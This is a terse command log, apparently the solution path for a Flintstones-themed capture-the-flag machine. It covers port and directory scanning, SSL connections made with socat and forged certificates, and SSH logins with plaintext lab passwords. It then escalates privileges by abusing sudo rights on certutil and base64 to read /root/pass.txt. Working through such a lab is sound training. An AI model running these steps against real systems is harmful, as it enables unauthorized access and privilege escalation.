nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
socat stdio ssl:$VICTIM:54321,cert=certficate,key=key,verify=0
ssh barney@$VICTIM
Password: d1ad7c0a3805955a35eb260dab4180dd
sudo -l
sudo /usr/bin/certutil -a fred.csr.pem
socat stdio ssl:$VICTIM:54321,cert=fred.certificate,key=fred.key,verify=0
ssh fred@$VICTIM
Password: YabbaDabbaD0000!
sudo -l
sudo /usr/bin/base64 /root/pass.txt
su root
Password: flintstonesvitamins
